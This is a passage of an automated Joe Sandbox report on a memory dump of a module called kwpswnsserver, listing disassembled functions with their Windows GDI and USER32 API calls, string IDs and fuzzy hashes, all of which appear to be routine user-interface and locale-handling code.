                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardFormatRegister
                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                  • API String ID: 1228543026-2889995556
                                                                  • Opcode ID: 843b02d527384dd43495c42aa65b2bf7ef76dc96264681c81f238dfd584e2cde
                                                                  • Instruction ID: c649be65b6498e510f463b79be9abe5e3005cafeeee542f808a9ebea07f36f75
                                                                  • Opcode Fuzzy Hash: 843b02d527384dd43495c42aa65b2bf7ef76dc96264681c81f238dfd584e2cde
                                                                  • Instruction Fuzzy Hash: F0114872A017219FCB346FBD9D2C4467EB0BA4B3063009E19A19EC7A00DA39D586CFD4
                                                                  Function 6C882D74 Relevance: 30.3, APIs: 20, Instructions: 265windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C882D7B
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882DD0
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882DE8
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C882E00
                                                                  • GetObjectW.GDI32(00000004,00000018,?), ref: 6C882E20
                                                                  • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6C882E46
                                                                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,6C9FDA60), ref: 6C882E69
                                                                  • CreatePatternBrush.GDI32(?), ref: 6C882E7B
                                                                  • DeleteObject.GDI32(?), ref: 6C882EAA
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 6C882EBB
                                                                  • GetPixel.GDI32(?,00000000,00000000), ref: 6C882F03
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C882F29
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 6C882F51
                                                                  • FillRect.USER32(?,?,?), ref: 6C882FB3
                                                                    • Part of subcall function 6C884000: __EH_prolog3.LIBCMT ref: 6C884007
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 6C882FE1
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 6C882FFC
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 6C883013
                                                                  • DeleteDC.GDI32(00000000), ref: 6C883080
                                                                  • DeleteDC.GDI32(00000000), ref: 6C88309C
                                                                  • DeleteDC.GDI32(00000000), ref: 6C8830BB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Create$Delete$BitmapCompatible$Object$BrushFillH_prolog3H_prolog3_PatternPixelRect
                                                                  • String ID:
                                                                  • API String ID: 308707564-0
                                                                  • Opcode ID: 03d32cb389597210dc81b5dce2b01bbc3fc0f747e7c97ba5011bd800e81bf6d3
                                                                  • Instruction ID: b6deefd6bebce76f61467cfb539f21335fcf8ff9ae471c95d9d194b40d67cf7a
                                                                  • Opcode Fuzzy Hash: 03d32cb389597210dc81b5dce2b01bbc3fc0f747e7c97ba5011bd800e81bf6d3
                                                                  • Instruction Fuzzy Hash: 84B1F3B1D02219AFDF219FA4CE94AEEBB79FF08348F204429F515A7A50DB319D15DB20
                                                                  Function 6C904227 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 254COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C904231
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C904279
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C90429A
                                                                  • SelectObject.GDI32(?,?), ref: 6C9042D5
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C904302
                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 6C90436A
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C904381
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C904393
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C9043AA
                                                                  • DeleteObject.GDI32(?), ref: 6C9043B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Create$Compatible$DeleteH_prolog3_Section
                                                                  • String ID: $(
                                                                  • API String ID: 1429849173-55695022
                                                                  • Opcode ID: b450eb202e0ebfe4134e628563f42c070ffa8adb1c25a327f76aa267643a48b9
                                                                  • Instruction ID: fd70167072c0e4dbf136625e73d55d996e4008b3b09ca06aeb95129abd40f538
                                                                  • Opcode Fuzzy Hash: b450eb202e0ebfe4134e628563f42c070ffa8adb1c25a327f76aa267643a48b9
                                                                  • Instruction Fuzzy Hash: 4FB15C71A00229DFDB25DF64CD54B9EBBB9BF59304F0082EAE449E7651DB308A85CF20
                                                                  Function 6C88BC33 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 179windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • GetParent.USER32(?), ref: 6C88BC74
                                                                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C88BC96
                                                                  • GetWindowRect.USER32(?,?), ref: 6C88BCBA
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C88BCDA
                                                                  • MonitorFromWindow.USER32(00000000,00000001), ref: 6C88BD13
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 6C88BD1A
                                                                  • CopyRect.USER32(?,?), ref: 6C88BD28
                                                                  • GetWindowRect.USER32(00000000,?), ref: 6C88BD35
                                                                  • MonitorFromWindow.USER32(00000000,00000002), ref: 6C88BD42
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 6C88BD49
                                                                  • CopyRect.USER32(?,?), ref: 6C88BD57
                                                                  • GetParent.USER32(?), ref: 6C88BD61
                                                                  • GetClientRect.USER32(00000000,?), ref: 6C88BD6E
                                                                  • GetClientRect.USER32(00000000,?), ref: 6C88BD79
                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 6C88BD87
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                                                  • String ID: (
                                                                  • API String ID: 3610148278-3887548279
                                                                  • Opcode ID: e63d52649129cf17f05cdc40038ee70ada2a9fc068bac5afa0bfe31f18b50275
                                                                  • Instruction ID: de6e320881ffd34f97d6dd3c7c431f0b36655ce39070583007397d5f7869fa8a
                                                                  • Opcode Fuzzy Hash: e63d52649129cf17f05cdc40038ee70ada2a9fc068bac5afa0bfe31f18b50275
                                                                  • Instruction Fuzzy Hash: 3E617172A0121EAFCF10DFA8CE88AEEB7B9FF85309F154614E505E7640DB30A946CB50
                                                                  Function 6C8A0935 Relevance: 28.7, APIs: 19, Instructions: 239windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A093C
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 6C8A0974
                                                                  • CopyRect.USER32(?,?), ref: 6C8A0988
                                                                  • InflateRect.USER32(?,?,?), ref: 6C8A099E
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8A09AA
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 6C8A09B4
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A09C9
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A09E3
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A0A2A
                                                                  • SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6C8A0A47
                                                                  • CopyRect.USER32(?,?), ref: 6C8A0A52
                                                                  • InflateRect.USER32(?,?,?), ref: 6C8A0A68
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8A0A74
                                                                  • SetRectRgn.GDI32(?,?,?,?,?), ref: 6C8A0A89
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A0A9A
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C8A0AAE
                                                                  • CombineRgn.GDI32(?,?,?,00000003), ref: 6C8A0AC8
                                                                    • Part of subcall function 6C8A0891: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 6C8A08D8
                                                                    • Part of subcall function 6C8A0891: CreatePatternBrush.GDI32(00000000), ref: 6C8A08E5
                                                                    • Part of subcall function 6C8A0891: DeleteObject.GDI32(00000000), ref: 6C8A08F1
                                                                  • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6C8A0B26
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834A3
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834B9
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C8838FA
                                                                    • Part of subcall function 6C8838DA: SelectClipRgn.GDI32(?,00000000), ref: 6C883910
                                                                  • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 6C8A0B89
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prolog3_Pattern
                                                                  • String ID:
                                                                  • API String ID: 770706554-0
                                                                  • Opcode ID: 50f7842f62dbd634b9230ba1cd6dbff7e0e6964a2e0cf3c5d321e5e6cda32887
                                                                  • Instruction ID: 5b6a8918574c718f49621934fb185ea6f1af61f09396ca8b10e5b5804523d293
                                                                  • Opcode Fuzzy Hash: 50f7842f62dbd634b9230ba1cd6dbff7e0e6964a2e0cf3c5d321e5e6cda32887
                                                                  • Instruction Fuzzy Hash: 6591F6B5A00219AFCF25EFE8DD94DEEBBB9BF48304B144529F506E3650DB34A905CB60
                                                                  Function 6C8E690A Relevance: 27.3, APIs: 18, Instructions: 337windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000004,00000004), ref: 6C8E6963
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8E6975
                                                                  • UpdateWindow.USER32(?), ref: 6C8E697E
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C8E69BF
                                                                  • DispatchMessageW.USER32(?), ref: 6C8E69D1
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8E69E1
                                                                  • GetCapture.USER32 ref: 6C8E69EB
                                                                  • SetCapture.USER32(?), ref: 6C8E69FC
                                                                  • GetCapture.USER32 ref: 6C8E6A08
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8E6A30
                                                                  • SetCursorPos.USER32(?,?), ref: 6C8E6A57
                                                                  • GetCapture.USER32 ref: 6C8E6A5D
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6C8E6A76
                                                                  • DispatchMessageW.USER32(?), ref: 6C8E6AA0
                                                                  • ReleaseCapture.USER32 ref: 6C8E6AE0
                                                                  • IsWindow.USER32(?), ref: 6C8E6AE9
                                                                  • SendMessageW.USER32(8589084D,00000010,00000000,00000000), ref: 6C8E6B02
                                                                  • SetTimer.USER32(?,0000EC05,00000000), ref: 6C8EA5BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendTimerUpdate
                                                                  • String ID:
                                                                  • API String ID: 3094444671-0
                                                                  • Opcode ID: b9300b92bcd926a3d0667fdd8d3004560b0966b43b4923b43208982ea1407119
                                                                  • Instruction ID: 59530ced82aa3dbe6cbeee13678df6da67266380de50d763d26f173b5ce4e287
                                                                  • Opcode Fuzzy Hash: b9300b92bcd926a3d0667fdd8d3004560b0966b43b4923b43208982ea1407119
                                                                  • Instruction Fuzzy Hash: C8B1B731B0131AABDF24EF68DE54AAE7775FF8A358F144529F605D7A80DB30A805CB50
                                                                  Function 6C88EF1F Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #32768$AfxOldWndProc423
                                                                  • API String ID: 0-2141921550
                                                                  • Opcode ID: 2bb432139eb738a863c41b640ce6e07deb12b423b34e3a266564c966b5a80319
                                                                  • Instruction ID: d43180563eca5a9d4f695080652185fa0d3be51d2ce3bfe8e1fb64579aed8192
                                                                  • Opcode Fuzzy Hash: 2bb432139eb738a863c41b640ce6e07deb12b423b34e3a266564c966b5a80319
                                                                  • Instruction Fuzzy Hash: 255108356012299BCB31AF64CD48FAA3B74AF15758F108998F815E7E80CB30DE42CBD0
                                                                  Function 6C906130 Relevance: 24.2, APIs: 16, Instructions: 155windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C906137
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C906165
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C90617E
                                                                  • SelectObject.GDI32(?,?), ref: 6C90619A
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9061BB
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C9061CC
                                                                  • CreateCompatibleDC.GDI32(?), ref: 6C9061E6
                                                                  • SelectObject.GDI32(?,?), ref: 6C9061FB
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C90620C
                                                                  • DeleteObject.GDI32(?), ref: 6C906215
                                                                  • BitBlt.GDI32(?,00000000,00000000,000000FF,?,?,00000000,00000000,00CC0020), ref: 6C906235
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 6C90625B
                                                                  • SetPixel.GDI32(?,?,00000000,00000000), ref: 6C9062A2
                                                                  • SelectObject.GDI32(?,?), ref: 6C9062C9
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C9062D3
                                                                  • DeleteObject.GDI32(?), ref: 6C9062DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
                                                                  • String ID:
                                                                  • API String ID: 3639146769-0
                                                                  • Opcode ID: 8e0ed3858efc6ec4b18a226f42d709c05c52e4ffb59e0d0929a68a025a6e1f65
                                                                  • Instruction ID: 782059060f60ff9ff1bdace10713dfe26234580dd1c43477870e2a6dba99697c
                                                                  • Opcode Fuzzy Hash: 8e0ed3858efc6ec4b18a226f42d709c05c52e4ffb59e0d0929a68a025a6e1f65
                                                                  • Instruction Fuzzy Hash: 42515C71A0126AEFCF259FA8CD54AEEBB79FF09304F104529F815E3550DB319952CB50
                                                                  Function 6C8A495E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 204timekeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyState.USER32(00000001), ref: 6C8A4969
                                                                  • GetCursorPos.USER32(?), ref: 6C8A498E
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8A499B
                                                                  • GetCapture.USER32 ref: 6C8A4A0D
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A4A50
                                                                  • WindowFromPoint.USER32(?,?), ref: 6C8A4A5C
                                                                  • IsChild.USER32(?,?), ref: 6C8A4A74
                                                                  • KillTimer.USER32(?,0000EC0A), ref: 6C8A4AB4
                                                                  • KillTimer.USER32(?,0000EC09), ref: 6C8A4ADD
                                                                    • Part of subcall function 6C88EC20: GetForegroundWindow.USER32 ref: 6C88EC2D
                                                                    • Part of subcall function 6C88EC20: GetLastActivePopup.USER32(?), ref: 6C88EC3E
                                                                  • GetParent.USER32(?), ref: 6C8A4B34
                                                                  • IsAppThemed.UXTHEME ref: 6C8A4B8E
                                                                  • OpenThemeData.UXTHEME(?,REBAR), ref: 6C8A4BA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorDataForegroundFromLastOpenParentPointPopupStateThemeThemed
                                                                  • String ID: REBAR
                                                                  • API String ID: 214255902-925029515
                                                                  • Opcode ID: c17b30d3b85b696d250e638855eb1130fdcae25fa974b1e38b6c5748d353842f
                                                                  • Instruction ID: 897c225641e50896e7b78d3eb252d771fe1499444fa1cfe418408971b109dc06
                                                                  • Opcode Fuzzy Hash: c17b30d3b85b696d250e638855eb1130fdcae25fa974b1e38b6c5748d353842f
                                                                  • Instruction Fuzzy Hash: 75618530700216AFDF159FA8C994AAD7BB5BFC5348B104A79E816E7690EF709902CB54
                                                                  Function 6C8A600A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 6C8A603D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 6C8A604D
                                                                  • EncodePointer.KERNEL32(00000000,?,?), ref: 6C8A6056
                                                                  • DecodePointer.KERNEL32(00000000,?,?), ref: 6C8A6064
                                                                  • GetUserDefaultUILanguage.KERNEL32(?,?), ref: 6C8A608B
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A609B
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A60CF
                                                                  • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8A6102
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A6112
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A614F
                                                                  • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 6C8A618A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                  • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                  • API String ID: 404278886-1646127487
                                                                  • Opcode ID: 51a094fb520475390cd9de826d906159326fab12fe8b8ca9e19ee22a76c9f71a
                                                                  • Instruction ID: 53960f57d61c5c5362a0997437764d8c072d1d96ccbfc0e45d0d617420899702
                                                                  • Opcode Fuzzy Hash: 51a094fb520475390cd9de826d906159326fab12fe8b8ca9e19ee22a76c9f71a
                                                                  • Instruction Fuzzy Hash: A8512CB290061AAFCB14DFA8CD84DEE77B9FF19304B014565E905E7650DB34EA0ACBA0
                                                                  Function 6C894A88 Relevance: 22.8, APIs: 15, Instructions: 313windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8A00A7: GetFocus.USER32 ref: 6C8A00AB
                                                                    • Part of subcall function 6C8A00A7: GetParent.USER32(00000000), ref: 6C8A00CC
                                                                    • Part of subcall function 6C8A00A7: GetWindowLongW.USER32(00000000,000000F0), ref: 6C8A00EB
                                                                    • Part of subcall function 6C8A00A7: GetParent.USER32(00000000), ref: 6C8A00F9
